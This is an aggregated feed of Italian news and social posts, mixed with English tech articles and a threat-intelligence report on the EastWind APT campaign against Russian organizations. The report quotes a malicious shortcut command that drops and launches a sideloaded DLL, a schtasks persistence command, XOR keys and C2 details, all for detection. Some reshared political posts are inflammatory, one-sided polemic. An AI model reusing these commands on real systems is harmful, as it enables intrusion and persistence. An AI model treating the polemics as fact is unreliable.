Un bug sui sistemi di gestione dei Pannelli Solari consente di Spegnere 4 Milioni di installazioni in 150 Paesi
Il problema della vulnerabilità delle tecnologie “intelligenti” sta diventando sempre più acuto. L’hacker olandese Wietse Boonstra ha recentemente dimostrato la gravità di tali minacce scoprendo la possibilità di spegnere 4 milioni di sistemi di energia solare in 150 paesi con il semplice clic di un pulsante. La scoperta ha confermato la legge di Hypponen: “Se qualcosa è intelligente, è vulnerabile”.
La portata della minaccia è impressionante. I pannelli solari nei Paesi Bassi possono produrre energia paragonabile alla produzione di quaranta centrali nucleari di tipo Borssele. Molti produttori però non offrono una protezione sufficiente contro gli hacker.
Boonstra, ricercatore sulla sicurezza presso la Judicial IT Organization (JIO), ha scoperto una grave falla nei sistemi di Enphase. Negli ultimi mesi la sua attenzione si è concentrata sui dispositivi che collegano i pannelli solari alla rete elettrica.
Sebbene il principio di funzionamento dei pannelli solari sia semplice – producono corrente continua, che viene poi convertita in corrente alternata per alimentare la rete – utilizza un inverter. Nei sistemi Enphase ogni pannello è dotato del proprio microinverter.
I clienti Enphase possono configurare e gestire i propri sistemi tramite un account personale, con la possibilità di delegare il controllo ad altri. Boonstra ha identificato una vulnerabilità critica: un bug nel software ha permesso di ottenere i diritti di amministratore sugli account di altre persone. Mettendo alla prova la sua teoria, creò due account amministrativi e scoprì che il primo poteva gestire il secondo senza permesso. Per la verifica finale, ha creato altri venti account e li ho gestiti con successo tutti attraverso il primo.
Insieme al collega Hidde Smith, Boonstra ha esaminato il firmware dei dispositivi Enphase e ha scoperto sei vulnerabilità che potrebbero essere utilizzate per infettare milioni di sistemi solari con del malware.
Questa situazione è paragonabile al concetto di “Unico Anello” de “Il Signore degli Anelli” di Tolkien: proprio come un anello controllava gli altri, così la vulnerabilità identificata consente il controllo di milioni di sistemi attraverso un account, il che minaccia la sicurezza energetica globale.
La vulnerabilità dei Paesi Bassi al sabotaggio della rete elettrica è in aumento. L’interconnessione dei sistemi di energia solare, delle stazioni di ricarica e delle batterie gestite centralmente rende il Paese più suscettibile a tali minacce. Gli esperti avvertono che la responsabilità della stabilità non può più spettare esclusivamente agli operatori di rete.
Nei Paesi Bassi i pannelli solari generano circa venti gigawatt di energia, paragonabili alla potenza di quaranta centrali nucleari. Una perdita improvvisa anche di pochi gigawatt può destabilizzare seriamente la rete elettrica.
L'articolo Un bug sui sistemi di gestione dei Pannelli Solari consente di Spegnere 4 Milioni di installazioni in 150 Paesi proviene da il blog della sicurezza informatica.
🔁 💰 Soldi pubblici -> software pubblico 🇨🇭 La Svizzera ha fatto una mossa rivoluzionaria: una nuova legge obbliga tutti i software utilizz...
💰 Soldi pubblici -> software pubblico
🇨🇭 La Svizzera ha fatto una mossa rivoluzionaria: una nuova legge obbliga tutti i software utilizzati nella pubblica amministrazione a essere rilasciati come opensource.
Informa Pirata: informazione e notizie
💰 Soldi pubblici -> software pubblico 🇨🇭 La Svizzera ha fatto una mossa rivoluzionaria: una nuova legge obbliga tutti i software utilizzati nella pubblica amministrazione a essere rilasciati come opensource.Telegram
🔁 Dimenticare Musk, che fa peggio di Porta a Porta feddit.it/post/10100695 Il nuovo post di ferrante è su feddit.it/c/giornalismo Dimentic...
Dimenticare Musk, che fa peggio di Porta a Porta
feddit.it/post/10100695
Il nuovo post di ferrante è su feddit.it/c/giornalismo
Dimenticare Musk, che fa peggio di Porta a Porta
@Giornalismo e disordine informativo
articolo21.
Informa Pirata: informazione e notizie
Dimenticare Musk, che fa peggio di Porta a Porta https://feddit.it/post/10100695 Il nuovo post di ferrante è su feddit.it/c/giornalismo Dimenticare Musk, che fa peggio di Porta a Porta @giornalismo articolo21.Telegram
Giornalismo e disordine informativo reshared this.
🔁 L’intervista di Elon Musk a Donald Trump ha sviluppato un self DDoS sulla sua stessa piattaforma feddit.it/post/10088216 Il nuovo post d...
L’intervista di Elon Musk a Donald Trump ha sviluppato un self DDoS sulla sua stessa piattaforma
feddit.it/post/10088216
Il nuovo post di cybersecurity è su feddit.
Informa Pirata: informazione e notizie
L’intervista di Elon Musk a Donald Trump ha sviluppato un self DDoS sulla sua stessa piattaforma https://feddit.it/post/10088216 Il nuovo post di cybersecurity è su feddit.Telegram
A Really Low Level Guide To Doing Ethernet on an FPGA
With so much of our day-to-day networking done wirelessly these days, it can be easy to forget about Ethernet. But it’s a useful standard and can be a great way to add a reliable high-throughput network link to your projects. To that end, [Robert Feranec] and [Stacy Rieck] whipped up a tutorial on how to work with Ethernet on FPGAs.
As [Robert] explains, “many people would like to transfer data from FPGA boards to somewhere else.” That basically sums up why you might be interested in doing this. The duo spend over an hour stepping through doing Ethernet at a very low level, without using pre-existing IP blocks to make it easier. The video explains the basic architecture right down to the physical pins on the device and what they do, all the way up to the logic blocks inside the device that do all the protocol work.
If you just want to get data off an embedded project, you can always pull in some existing libraries to do the job. But if you want to really understand Ethernet, this is a great place to start. There’s no better way to learn than doing it yourself. Files are on GitHub for the curious.
Laser Cutters: Where’s the Point?
It is funny how when you first start doing something, you have so many misconceptions that you have to discard. When you look back on it, it always seems like you should have known better. That was the case when I first got a low-end laser cutter. When you want to cut or engrave something, it has to be in just the right spot. It is like hanging a picture. You can get really close, but if it is off just a little bit, people will notice.
The big commercial units I’ve been around all had cameras that were in a fixed position and were calibrated. So the software didn’t show you a representation of the bed. It showed you the bed. The real bed plus whatever was on it. Getting things lined up was simply a matter of dragging everything around until it looked right on the screen.
Today, some cheap laser cutters have cameras, and you can probably add one to those that don’t. But you still don’t need it. My Ourtur Laser Master 3 has nothing fancy, and while I didn’t always tackle it the best way, my current method works well enough. In addition, I recently got a chance to try an XTool S1. It isn’t that cheap, but it doesn’t have a camera. Interestingly, though, there are two different ways of laying things out that also work. However, you can still do it the old-fashioned way, too.
Humble Beginnings
I started out with a Laser Master 2, but it really had no comfort features. You had to focus the laser by observing the beam, and there was nothing to help you with positioning. I thought I would be clever and have the laser cut a grid into a spoil board so I could lay things out. That didn’t work well at all.
There are a few reasons a grid like that isn’t as useful as you’d think. First, if you do want to try it, the board needs to be totally secure with respect to the laser cutter’s frame. Otherwise, if the board or laser moves, you are now off. Even just a little tilt or slide will show up in the finished product. But the big problem is the workpiece has to be totally square with the frame, or things will be crooked.
A Better Plan
It didn’t take many ruined pieces to realize I needed a better way. The answer turned out to be wrapping paper. A trip to the dollar store will give you plenty of wrapping paper, and it can be ugly — you don’t care what it looks like since you’ll use the back.
Suppose I’m going to engrave a notebook with a logo and name. I’ll have some outline representing the book. The steps are simple:
1) Put down the wrapping paper and tape it to the cutter’s bed.
2) Turn off everything and then turn on just the outline vector.
3) Focus on the paper and do the engrave.
Now, you have a perfect book-shaped rectangle on the paper. If the bed is tilted, it doesn’t matter because so is the rectangle.
4) Place the book inside the outline on the paper.
5) Refocus the laser.
6) Turn off the outline layer and turn on the other layers.
7) Burn!
The Laser Master 3 added a nice feature, which was a little hinged stick that flops out of the laser and lets you easily set the focus. I’d been doing that before with a little homemade cube, but it was nice to have it all set up.
No Camera, No Problem
The S1 is a fairly high-end machine for a diode laser, so I was a little surprised it didn’t have a camera. However, what it does have is closed-loop motor control. What that means is that if you move the laser head with your hands, the machine still knows where it is. There’s also a little laser pointer cross that shows you where the laser head is — sort of. There is an offset between the actual beam and the cross, but if you use their software, they know that. If you use Lightburn, you have to set that yourself.
So if you have a book you want to engrave on the bed, you tell the software to “mark.” It lets you pick a few shapes, but usually, you want a rectangle. You line up the laser cross with the top corner of the book (or whatever) and press the button on the machine. You hear a loud beep. Then, you move to the far bottom corner and press the button again. That’s it.
Now, the software will place a little box that shows exactly where the book is. This doesn’t help you correct for small skew problems, but it does let you accurately move things to the right location.
The machine also has an interesting way of dealing with autofocus. It has a metal pin that drops from the laser head sort of like a BL Touch on a 3D printer. When it hits something, it knows how far away the surface is. Then, it moves to a corner where a metal plate pushes the pin back up. You need to make sure the head is over something before you tell it to measure. If you have a honeycomb bed, the laser head will bottom out before the pin, and you’ll hear some ugly noises.
But A Picture is Worth…
If you can’t stand not having an image of your workspace, the S1 can do it, but honestly, it is a pain. The printer comes with little sticky target decals, and you can make more if you need them. Three of them look like little bullseyes, and one is just a small dot. You place them somewhere on the bed where the laser can reach.
After you install the phone app, you can connect to the printer and calibrate the dots. You do this just like the marking routine. You aim at each target and press the button. Now, the software knows exactly where each bullseye is.
The next step is to take a picture of the bed with your phone. Since the software knows the bullseyes are circles and where they are, it can reconstruct a proper view of your bed. Moving it to your computer is a pain the first time since you have to scan a QR code on the computer to make a connection. After that, though, it just sends it. The problem, of course, is the shot isn’t live. You have to fix up the bed the way you want, shoot the picture, and then don’t change anything after that.
One tip: don’t cut anything on top of the bullseyes. They will blacken up and then you’ll need some extras. Not that we’ve done that, of course!
The Answer
It seems odd that cameras haven’t taken over everything. They work well, and a live view is handy. However, if you don’t have a camera, there are clear alternatives. For as much as the Xtool system is clever, it still doesn’t help you with crooked alignment. It is, however, better than the wrapping paper method for things where you don’t know the size already.
If you do know the size of the workpiece, though, it really isn’t that handy. Sure, you don’t have to tape down paper and score it with a framing cut, but that’s a small price to pay for the benefit you get. If we were building our own cutter, we’d seriously consider adding a probe, though.
How do you get engraving to go where you want it? Do you have another method? Let us know in the comments. If you haven’t splurged on a laser yet, you might enjoy a tutorial.
Fratelli d’Italia contro Elodie: “Attacca Meloni solo per vendere il calendario”
@Politica interna, europea e internazionale
Fratelli d’Italia contro Elodie: “Attacca Meloni solo per vendere il calendario” Fratelli d’Italia si scaglia contro Elodie dopo le parole di quest’ultima su Giorgia Meloni. In un’intervista a La Repubblica, infatti, la cantante ha dichiarato: “Non ho simpatia per questo governo, perché per me
like this
reshared this
A sei anni dalla tragedia del Ponte Morandi non si scorge ancora una luce in fondo al tunnel del processo. Se tutto andrà bene, la sentenza di primo grado per i 59 indagati arriverà nel 2026. Di coloro che hanno tratto il massimo profitto dalle mancate manutenzioni del viadotto, però, non risulta neppure l'ombra in tribunale. Anzi, a questi signori abbiamo pure offerto una generosa liquidazione pagando a peso d'oro le quote di Aspi.
Dopo trent'anni di Unione europea, lo Stato italiano non è neppure in grado di render giustizia alle vittime delle privatizzazioni selvagge e alle loro famiglie. L'unica cosa di cui sono capaci le nostre istituzioni ormai è proporre parole vuote, dense soltanto d'ipocrisia, mentre si procede a passo spedito sulla strada che ha distrutto il viadotto Polcevera e dilaniato il nostro Paese.
PRO ITALIA
Il ministero della Difesa Russo ha comunicato che un blindato di fabbricazione italiana Shield è stato distrutto in un bombardamento nella regione russa di Kursk. Quindi si presume che siano entrati in Russia con mezzi e armi Italiane.
Crosetto qualche giorno fa ci ha rassicurati che nessun armamento inviato a Zelensky dall'Italia è stato usato per invadere il territorio Russo. Tajani ha dichiarato che le armi italiane sul suolo Russo non si usano.
La donna, madre e Cristiana invece tace. Qui ci devono spiegare un paio di cosette: o non contano nulla nemmeno agli occhi di Zelensky, oppure ci stanno mentendo spudoratamente sapendo di mentire.
In tutto ciò ancora è segreto l'elenco delle armi inviate in Ucraina e dall'opposizione non si vede alcuna iniziativa concreta per fare chiarezza. Soprattutto da quel PD guidato da Elly Schlein che sembra la guardia del corpo di Meloni per quanto riguarda la posizione guerrafondaia e ultra atlantista assunta dall'Italia.
Traditori della patria!
T.me/GiuseppeSalamone
Sono mesi che la propaganda criminale occidentale ci racconta che gli Usa stiano lavorando per fermare la carneficina a Gaza, addirittura da un paio di settimane, mentre continuiamo a vedere bambini fatti a pezzi da Netanyahu, ci propongono a reti unificate le parole di Biden secondo le quali un cessate il fuoco è vicino.
Mentre i pennivendoli ci raccontano una narrazione volutamente distorta, dal Dipartimento di Stato Usa approvano vendite di armi per il criminale di guerra Netanyahu e lo stato terrorista di Israele per oltre 20 miliardi di dollari. Ripeto: 20 MILIARDI DI DOLLARI!
Una cinquantina di aerei per circa 19 miliardi di dollari; veicoli tattici, carri armati e missili per altri 2,1 miliardi di dollari. Inoltre si profila anche l'approvazione per equipaggiamento di aerei, lanciatori di missili aria-aria a medio raggio, cannoni M61A Vulcan e sistemi di posizionamento globale e di navigazione inerziale integrati.
Una lista della spesa che serve per continuare a massacrare i Palestinesi. Ora ditemi quale altro paese al mondo è presente in tutti i campi di battaglia più caldi ammassando armi: Ucraina, Palestina e Taiwan. Ditemi quale altro paese continua a lavorare per inasprire ogni singola zona di conflitto. Ditemi quale altro paese continua a fare profitti vendendo o regalando armi in giro per il mondo.
Ditemi quale altro Paese, al mondo, è più criminale degli Stati Uniti d'America e dello stato terrorista di israele.
T.me/GiuseppeSalamone
Giuseppe Salamone
reshared this
Badilate sui denti per i propagandisti Nato Mauro, penna di Repubblica, Mieli e Quirico. Quelli che oggi sono considerati tra i migliori intellettuali italiani:
"La Russia sarebbe colpevole di avere infranto il diritto internazionale invadendo l’Ucraina. Poiché crediamo nella razionalità, patrimonio universale dell’umanità, vorremmo chiedere allo stimato giornalista se la violazione delle frontiere da parte della Nato a Belgrado, in Afghanistan, in Iraq, in Libia avrebbe dovuto implicare armi, addestramento militare, mercenari e scesa in campo dell’intelligence da parte di Cina e Russia a favore di quei Paesi aggrediti. Vorremmo anche chiedergli se l’ordine internazionale si viola soltanto oltrepassando le frontiere di uno Stato sovrano. L’espansionismo della Nato ai confini della Russia, unico Paese escluso dalla sicurezza collettiva, non calpesta l’indivisibilità della sicurezza in Europa sancita dai principi di Helsinki e traslata nella Carta di Parigi dell’Osce?" (Elena Basile)
T.me/GiuseppeSalamone
Bambina rom investita a Torino, Salvini attacca i servizi sociali. La replica: “Strumentalizza tragedia a fini politici”
@Politica interna, europea e internazionale
L’Ordine degli Assistenti Sociali risponde a Matteo Salvini, che aveva tirato in ballo la categoria commentando il caso della bambina di 2 anni morta investita da un’auto in manovra nel parcheggio dell’ospedale San
Politica interna, europea e internazionale reshared this.
🔁 Migrazione Peertube.uno in corso! feddit.it/post/10097174 Il nuovo post di Filippodb è su feddit.it/c/devol ⚠️ AVVISO ❗️Stiamo migra...
Migrazione Peertube.uno in corso!
feddit.it/post/10097174
Il nuovo post di Filippodb è su feddit.it/c/devol
⚠️ AVVISO
❗️Stiamo migrando peertube.
Informa Pirata: informazione e notizie
Migrazione Peertube.uno in corso! https://feddit.it/post/10097174 Il nuovo post di Filippodb è su feddit.it/c/devol ⚠️ AVVISO ❗️Stiamo migrando peertube.Telegram
La sera del 14, nel ristorante (buono!) dove sono andata a mangiare, il proprietario, chiacchierando con un amico o avventore abituale, riuscì a dare la colpa della tragedia agli immigrati.
Ne rimasi talmente scioccata che manco mi ricordo con quale volo pindarico della fantasia fosse riuscito a giungere a quella conclusione.
Ma come cazzo si fa?
Me lo chiesi allora e me lo chiedo ancora, ogni giorno.
Non può essere più facile prendersela con i più deboli che con chi detiene il potere di fare le cose per bene e invece le fa ammerda per proprio tornaconto.
Bisogna tenere d'occhio e spaccare le palle ai "controllori", non ai poveracci!
#PonteMorandi
Musk: ma quale attacco DDoS! 9 milioni di ascoltatori per una interessante intervista
Lunedì sera sulla piattaforma X Spaces avrebbe dovuto svolgersi la tanto attesa intervista di Elon Musk con l’ex presidente degli Stati Uniti Donald Trump. Tuttavia, l’evento, previsto per le 20:00 è stato rinviato a causa di gravi problemi tecnici.
Subito dopo l’inizio della trasmissione si è verificato un problema tecnico e l’intervista è iniziata 42 minuti dopo. Coloro che sono riusciti a connettersi alla piattaforma hanno riferito che la musica lo-fi è stata trasmessa dall’account di Trump per circa 30 minuti.
18 minuti dopo l’inizio previsto, Musk ha annunciato che X era l’obiettivo di un “massiccio attacco DDoS “. Tuttavia, il resto di X sembrava funzionare bene. Una fonte aziendale ha confermato che in realtà non si è verificato alcun attacco di negazione del servizio. Un altro dipendente ha detto che con molta probabilità Musk mentiva riguardo all’attacco.
In una serie di post successivi, Musk ha affermato che lunedì la società ha testato il sistema con 8 milioni di ascoltatori. Quando finalmente l’intervista è iniziata, intorno alle 20:40, X ha riferito che Space aveva 915.000 ascoltatori.
Musk ha ripetuto la dichiarazione sull’attacco DDoS quando finalmente è iniziata la trasmissione. “Come dimostra questo massiccio attacco, l’opposizione semplicemente non vuole che la gente senta ciò che il presidente Trump ha da dire“, ha detto. Quindi, se il miliardario ha mentito, le sue parole sarebbero una sorta di manipolazione politica.
youtube.com/embed/JUlDHBKR-fM?…
Il mancato avvio dell’intervista ha ricordato gli eventi del 2023, quando il governatore della Florida Ron DeSantis annunciò su X la sua partecipazione alla corsa presidenziale. Poi l’evento è stato accompagnato anche da problemi tecnici, che Elon ha spiegato con un sovraccarico dei server.
Il Register inoltre non ha trovato prove di un attacco DDoS contro X. La mappa delle minacce informatiche di Check Point Software non ha registrato livelli insoliti di attività al momento della trasmissione. La mappa degli attacchi DDoS in tempo reale di NetScout ha mostrato solo piccoli attacchi negli Stati Uniti.
Quando finalmente l’intervista è iniziata, era inclusa una retorica e un linguaggio che sarebbero stati familiari ai fan di entrambi i partecipanti. Trump ha criticato le politiche dell’amministrazione Biden, ha definito i suoi oppositori politici radicali pericolosi e ha messo in guardia dalle conseguenze negative. Ha anche fatto alcune dichiarazioni criptiche, inclusa la menzione del “riscaldamento nucleare“.
Entrambi gli interlocutori hanno lamentato l’eccessiva regolamentazione come un ostacolo per le imprese e l’innovazione, chiedendo riforme. Hanno trovato un linguaggio comune sulla questione dello sviluppo delle infrastrutture di trasporto interurbano ad alta velocità, anche se Trump preferisce i treni e Musk preferisce fare affidamento sui tunnel sotterranei.
Durante la conversazione è stato toccato anche il tema della tecnologia. Trump ha espresso preoccupazione per il fatto che il potenziale dell’intelligenza artificiale potrebbe non essere realizzato a causa delle attuali politiche energetiche che danno priorità alle fonti rinnovabili. “L’intelligenza artificiale richiede il doppio dell’energia prodotta attualmente dagli Stati Uniti”, ha affermato il politico. Musk ha espresso l’opinione che la generazione solare diventerà in futuro la principale fonte di energia negli Stati Uniti.
In sintesi, questa intervista, nonostante le difficoltà tecniche, è stata un momento culminante che ha dimostrato sia le capacità che i limiti delle moderne piattaforme di trasmissione online. Ha inoltre offerto al pubblico l’opportunità di ascoltare due figure influenti su un’ampia gamma di questioni attuali, dalla politica all’economia, alla tecnologia e al futuro dell’energia.
L'articolo Musk: ma quale attacco DDoS! 9 milioni di ascoltatori per una interessante intervista proviene da il blog della sicurezza informatica.
guy debord @ ubuweb
slowforward.net/2024/08/14/guy…
Guy Debord (1931-1994)
Critique de la séparation (1961)
Guy Debord was born in Paris on December 28, 1931. In 1950 Debord began his association with the Lettrist International, which was being led by Isidore Isou at the time. The Lettrists were attempting to fuse poetry and music, and were interested in transforming the urban landscape. In 1953 they mapped out what they called the “psychogeography” of Paris by walking through the city in a free-associative manner, or “drifts”. Texts on this activity were first published in Naked Lips in 1955 and 1956, in essays titled “Detournement: How to Use” and “Theory of the Derive.”
slowforward.net/2024/08/14/guy…
#archive #archivi #archivio #cinema #GuyDebord #Situationism #Situazionismo #UbuWeb
guy debord @ ubuweb
Guy Debord (1931-1994) Critique de la séparation (1961) Hurlements en faveur de Sade (1952) In Girum Imus Nocte Et Consumimur Igni (1978) Refutation of All the Judgements, Pro or Con, Thus Far …slowforward
due pietre di leonessa, asemiche / fabrizio m. rossi. 2024
EastWind campaign: new CloudSorcerer attacks on government organizations in Russia
In late July 2024, we detected a series of ongoing targeted cyberattacks on dozens of computers at Russian government organizations and IT companies. The threat actors infected devices using phishing emails with malicious shortcut attachments. These shortcuts were used to deliver malware that received commands via the Dropbox cloud service. Attackers used this malware to download additional payloads onto infected computers, in particular tools used by the APT31 group and an updated CloudSorcerer backdoor. We dubbed this campaign EastWind.
Below are the most interesting facts about the implants used in this campaign:
- The malware downloaded by the attackers from Dropbox has been used by APT31 since at least 2021. We named it GrewApacha.
- The attackers updated the The CloudSorcerer backdoor (described by us in early July 2024) ) after we published our blogpost. It currently uses LiveJournal (a social network popular in Russia) and Quora profiles as initial C2 servers.
- The attacks additionally deploy a previously unknown implant with a classic backdoor functionality, which we dubbed PlugY. It is loaded via the CloudSorcerer backdoor, and its command set is quite extensive. It supports three different protocols for communicating with C2, and what’s more, its code resembles that of the DRBControl backdoor (aka Clambling), which several companies attribute to the APT27 group.
Technical information
As mentioned above, the attackers used spear phishing to gain an initial foothold into the organizations. They sent malicious emails with attached RAR archives to target organizational email addresses. These archives had the following names:
- инициативная группа из Черниговского района Приморского края.rar (translates as advocacy group from Chernigov district of Primorsky Krai.rar)
- вх.rar
They contained the following files:
- .con folder, which contained:
- 1.docx, a legitimate decoy document
- desktop.exe, a legitimate file
- VERSION.dll, a malicious file
- A malicious shortcut with a name similar to that of the archive.
When clicked on, the shortcut executed the following command:
C:\Windows\System32\cmd.exe /c .con\1.docx & echo F | move .con\doc %public%\Downloads\desktop.exe & move .con\docs %public%\Downloads\VERSION.dll & start /b %public%\Downloads\desktop.exe && exit
This command opens the document contained in the archive, copies the files desktop.exe and VERSION.dll to the C:\Users\Public\Downloads folder, and then launches the desktop.exe file.
Note the use of a similar infection method in an attack on a US organization that involved use of the CloudSorcerer backdoor, reported by Proofpoint in July 2024:
Contents of the malicious archive used in the attack on a US organization
VERSION.dll – a backdoor that uses Dropbox
The attackers use classic DLL sideloading to load the malicious library VERSION.dll into the desktop.exe process:
| MD5 | 1f5c0e926e548de43e0039858de533fc |
| SHA1 | 426bbf43f783292743c9965a7631329d77a51b61 |
| SHA256 | 668f61df2958f30c6a0f1356463e14069b3435fb4e8417a948b6738f5f340dd9 |
| File size | 9.82 MB |
This library is a backdoor packed using the VMProtect tool. When started, it attempts to contact Dropbox using a hardcoded authentication token. Once connected to the Dropbox cloud, the backdoor reads commands to be executed from the file <computer name>/a.psd contained in the storage. The backdoor supports a total of five commands, named as follows:
- DIR
- EXEC
- SLEEP
- UPLOAD
- DOWNLOAD
The results of running these commands are uploaded to the file <computer name>/b.psd that is stored in the cloud..
GrewApacha: a RAT used by APT31 since 2021
The threat actors used the above backdoor to collect information about infected computers and install additional malware on them. On one of these computers, we observed the download of the following files to the directory C:\ProgramData\USOShared\Logs\User:
- msedgeupdate.exe, a legitimate executable file signed by Microsoft
- msedgeupdate.dll, a malicious library
- wd, a file with an encrypted payload
When the attackers launched msedgeupdate.exe, the malicious library msedgeupdate.dll was loaded into its process by means of DLL sideloading:
| MD5 | f6245f64eaad550fd292cfb1e23f0867 |
| SHA1 | fccdc059f92f3e08325208f91d4e6c08ae646a78 |
| SHA256 | e2f87428a855ebc0cda614c6b97e5e0d65d9ddcd3708fd869c073943ecdde1c0 |
| File size | 9 MB |
While this set of three files resembles the “sideloading triad” that is typical of attacks involving PlugXanalysis of these files revealed that the malware inside them is a RAT of the APT31 group, already described in 2021 and 2023. We dubbed this RAT ‘GrewApacha’.
The behavior of the loader (msedgeupdate.dll) hasn’t changed since the 2023 post was published. As before, it decrypts the payload stored on the drive using the XOR key 13 18 4F 29 0F, and loads it into the dllhost.exe process.
While the GrewApacha loader has not changed since last year, there have been minor differences introduced to the RAT itself. Specifically, the new version now uses two C2 servers instead of one. Through network communications, the cybercriminals first retrieve a webpage with a profile bio on GitHub. This profile contains a string encoded with the Base64 algorithm:
Profile of a user created by the attackers on GitHub
The malware first decodes the string extracted from the GitHub profile, then decrypts it using a single-byte XOR algorithm with the key 0x09, thereby obtaining the address of the main C2 server (for the screenshot above – update.studiokaspersky[.]com).
New version of the CloudSorcerer backdoor
Besides launching the GrewApacha Trojan described above, we found that the attackers also downloaded the CloudSorcerer backdoor onto infected computers. To do that, they downloaded and launched a tool named GetKey.exe that is packed with the VMProtect obfuscator.
| MD5 | bed245d61b4928f6d6533900484cafc5 |
| SHA1 | e1cf6334610e0afc01e5de689e33190d0c17ccd4 |
| SHA256 | 5071022aaa19d243c9d659e78ff149fe0398cf7d9319fd33f718d8e46658e41c |
| File size | 51 KB |
The utility receives a four-byte number (the value of the GetTickCount() function at runtime), encrypts it using the CryptProtectData function, and then outputs the number with its ciphertext. The screenshot below shows the code of the tool’s main function:
The attackers used the tool output on their side as a unique key to encrypt the payload file. By handling the encryption with the CryptProtect function, the attackers made it possible to decrypt the payload only on the infected machine.
After running the tool, the attackers downloaded the following files to the infected machine:
- The renamed legitimate application dbgsrv.exe (example name: WinDRMs.exe), signed by Microsoft
- The malicious library dll
- A file with the .ini extension, containing the encrypted payload. The name of this file varied across infected machines.
As in the above case of GrewApacha, this set resembles the “sideloading triad” used in attacks involving PlugX.
IIn most cases, the attackers uploaded files inside a subdirectory of C:\ProgramData, such as C:\ProgramData\Microsoft\DRM. Afterwards, they used the task scheduler to configure the renamed dbgsrv.exe application to launch at OS startup. This involved the schtasks utility (usage example:
schtasks /create /RL HIGHEST /F /tn \Microsoft\Windows\DRM\DRMserver /tr "C:\ProgramData\Microsoft\DRM\WinDRMs.exe -t run" /sc onstart /RU SYSTEM").
Upon startup of the renamed application, the malicious dbgeng.dll library is loaded into its process, again using DLL sideloading.
| MD5 | d0f7745c80baf342cd218cf4f592ea00 |
| SHA1 | c0e4dbaffd0b81b5688ae8e58922cdaa97c8de25 |
| SHA256 | bd747692ab5db013cd4c4cb8ea9cafa7577c95bf41aa2629a7fea875f6dcbc41 |
| File size | 1.11 MB |
This library was programmed to read the previously mentioned .ini file, which contains:
- The ciphertext of a four-byte number generated and encrypted by the GetKey.exe utility
- A PE file compressed with the LZNT1 algorithm and XOR-encrypted using the four-byte number as a key.
Accordingly, the library proceeded to decrypt the four-byte number using the CryptUnprotectData function, use it to decrypt the .ini file, and then load the decrypted file into the memory of the current process.
Analysis of the decrypted .ini files revealed them to be updated versions of the CloudSorcerer backdoor. After we publicly described this backdoor in early July 2024, the attackers modified it: the new version of CloudSorcerer uses profile pages on the Russian-language social network LiveJournal and the Q&A site Quora as the initial C2 servers:
As with past versions of CloudSorcerer, the profile bios contain an encrypted authentication token for interaction with the cloud service.
PlugY: an implant that overlaps with APT27 tools
Having analyzed the behavior of the newly found CloudSorcerer samples, we found that the attackers used it to download a previously unknown implant. This implant connects to the C2 server by one of three methods:
- TCP protocol
- UDP protocol
- Named pipes
The set of commands this implant can handle is quite extensive, and implemented commands range from manipulating files and executing shell commands to logging keystrokes and monitoring the screen or the clipboard.
Analysis of the implant is still ongoing, but we can conclude with a high degree of confidence that the code of the DRBControl (aka Clambling) backdoor was used to develop it. This backdoor was described in 2020 by Trend Micro and Talent-Jump Technologies. Later, Security Joes and Profero linked it to the APT27 group. The backdoor also has similarities to PlugX.
Our comparison of samples of the PlugY implant (MD5 example: faf1f7a32e3f7b08017a9150dccf511d) and the DRBControl backdoor (MD5: 67cfecf2d777f3a3ff1a09752f06a7f5) revealed that these two samples have the exact same architecture. Additionally, many commands in them are implemented almost identically, as evidenced by the screenshots below:
Command code for retrieving information about connected disks in the DRBControl backdoor (left) and the implant (right)
Command code for retrieving information about the active window in the DRBControl backdoor (left) and the implant (right)
Command code for taking screenshots in the DRBControl backdoor (left) and the implant (right)
Thus, the code previously observed in attacks by APT27 was likely used in developing the implant.
While analyzing the PlugY implant we also noticed that it uses a unique malicious library to communicate with the C2 server via UDP. We found the very same library in the DRBControl backdoor, as well as several samples of the PlugX backdoor, which is popular among Chinese-speaking groups. Apart from DRBControl and PlugX, this library has not been detected in any other malware.
Screenshot of the library communicating with the C2 server via UDP
Tips for attack detection
The implants identified during the attack significantly differ from each other. As such, it’s necessary to use a separate set of IoCs for each malware used in any compromise.
The backdoor that uses Dropbox and is delivered via email can be found by looking for relatively large DLL files (> 5 MB) located in the directory C:\Users\Public. Regular access to the Dropbox cloud in network traffic can serve as an additional indicator of this backdoor’s operation.
The GrewApacha Trojan can be detected by searching for an unsigned file named msedgeupdate.dll in the file system. This file also reaches several megabytes in size.
The PlugY implant that is delivered using the CloudSorcerer backdoor launches a process named msiexec.exe for each user signed to the OS, and also creates named pipes with the name template \.\PIPE\Y. The presence of these two indicators in the system is strong evidence of an infection.
Conclusion
In attacks on government organizations, threat actors often use toolkits that implement a wide variety of techniques and tactics. In developing these tools, they go to the greatest lengths possible to hide malicious activity in network traffic. For instance, the attackers behind the EastWind campaign, for instance, used popular network services (GitHub, Dropbox, Quora, LiveJournal and Yandex.Disk) as C2 servers.
Notably, the EastWind campaign bore traces of malware from two different Chinese-speaking groups: APT27 and APT31. This clearly shows that APT groups very often team up, actively sharing knowledge and tools. To successfully counter such collaborations, we closely monitor the techniques and tactics of APT groups operating around the world.
Ita Airways nuovo sponsor della Juventus, ma Meloni fa saltare l’accordo
@Politica interna, europea e internazionale
Ci sarebbe il veto di Giorgia Meloni dietro lo stop all’accordo tra Ita Airways e la Juventus per fare della compagnia aerea il nuovo main sponsor del club torinese. Lo rivelano diverse indiscrezioni giornalistiche, secondo cui la presidente del Consiglio vuole evitare di dare altri
Politica interna, europea e internazionale reshared this.
Ius Scholae, Lega contro Forza Italia: “La legge sulla cittadinanza va benissimo così com’è”
@Politica interna, europea e internazionale
Si apre uno scontro nella maggioranza di governo sul tema dello Ius Soli, anche se sarebbe più corretto parlare di Ius Scholae. L’apertura di Forza Italia a una revisione delle norme sulla concessione della cittadinanza italiana non è piaciuta alla Lega, che ha
Politica interna, europea e internazionale reshared this.
Verso un’Europa della difesa, quale ruolo per l’Italia? Scrive Michele Nones
[quote]La costruzione dell’Europa della difesa è un processo lungo, complesso e tormentato che procede per “stop and go” e a velocità differenziate fra il livello comunitario, intergovernativo e multilaterale (quasi sempre bi o trilaterale). Nessuno è in grado di prevederne realisticamente
De Domenico (ONU): “Israele ci ha costretti a lasciare il nord di Gaza e ora vieta i visti per gli operatori”
@Notizie dall'Italia e dal mondo
Un estratto dell'intervista al direttore dell'Ufficio ONU per il coordinamento degli affari umanitari nei Territori palestinesi occupati (OCHA). Andrea De Domenico è stato costretto a lasciare
Notizie dall'Italia e dal mondo reshared this.
I veleni degli aeroporti che nessuno vuole vedere
@Notizie dall'Italia e dal mondo
Il nuovo articolo di @valori
